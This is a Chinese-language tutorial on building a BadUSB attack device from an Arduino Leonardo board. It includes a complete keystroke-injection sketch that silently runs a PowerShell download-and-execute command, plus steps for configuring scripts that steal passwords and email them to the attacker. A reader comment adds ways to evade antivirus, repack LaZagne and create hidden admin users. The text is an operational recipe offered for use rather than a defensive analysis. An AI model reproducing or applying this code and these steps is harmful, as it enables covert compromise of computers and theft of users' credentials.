
黑白网(heibai.org)成立于2014年,多年来以其专业的视角,优质的服务为广大安全技术爱好者提供了目前国内最全的网络安全技术学习资料,普及中国网络安全知识,宣扬正确的黑客极客文化,全方面提高国内安全技术水平。
在文章开始之前我们先看看BadUSB内部构造
在接下来看看BadUSB HID的攻击原理以及优势
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,本文要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。
而优势在于攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB的攻击。
BadUSB攻击流程
Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
本文中我们使用
软件:Arduino
硬件:BS Micro pro micro leonardo Arduino 开发板
硬件如图
需安装Teensyduino驱动
需要注意的是安装路径得同ardunio的安装路径
在正式开始烧写之前,我们需要下载BadUSB代码文件
就这玩意儿
修改main.ps1文件,如下图
将勾选部分xxx.xxx修改为自己域名
修改勾选部分
发信服务器如smtp.qq.com/smtp.163.com
邮箱账号/密码(授权码)
邮件标题如”BadUSB新鱼儿来啦“
邮件内容如“BadUSB获取结果”
修改GetPass.ps1文件前两行勾选部分为自己域名
同时修改第6行开始的发信配置,如main.ps1文件一样修改即可。此处不过多赘述
将修改后的全部文件用HFS上传到服务器(注意服务器需要外网访问,hfs网络文件服务器百度下载即可)
将硬件插入Usb接口并输入Windows +R 输入命令devmgmt.msc打开设备管理器
查看串口信息
打开Arduino IDE并根据以下路径 工具->版->选择“Arduino Leonardo”
port选择串口信息相符的
void setup(){ Keyboard.begin(); delay(5000); Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.press(‘r’); delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release(‘r’); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println(“CMD”); delay(500); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(3000); Keyboard.println(“powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString(‘http://xx.xxx.xx/main.ps1’) “); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() {}
将改代码烧写入硬件
xx.xxx.xx修改为自己的地址
然后就没了…
附件下载
天妖
回复(1)如何进入CMD后,keyboard通过CTRL+SHIFT+ENTER进入管理员模式的DOS界面
(2)没有绕过360或者腾讯电脑管家主动防御
(3)lazagened没有重新打包,MD5已被杀软云端记录
(3)没有最大化的隐藏操作界面,黑乎乎的一片界面期间如果第一反应按键盘所有的命令可能会失效无法识别
(4)没有控制文件存放位置,现在国内部分主机如果固态硬盘只会有一个C盘,没有控制文件存放位置,有几率可能给邮箱发送空文件
(5)没有新建隐藏用户,获取的密码以及未在管理员模式下进行,密码获取不全面
这些如果您都改了,那简直很beautiful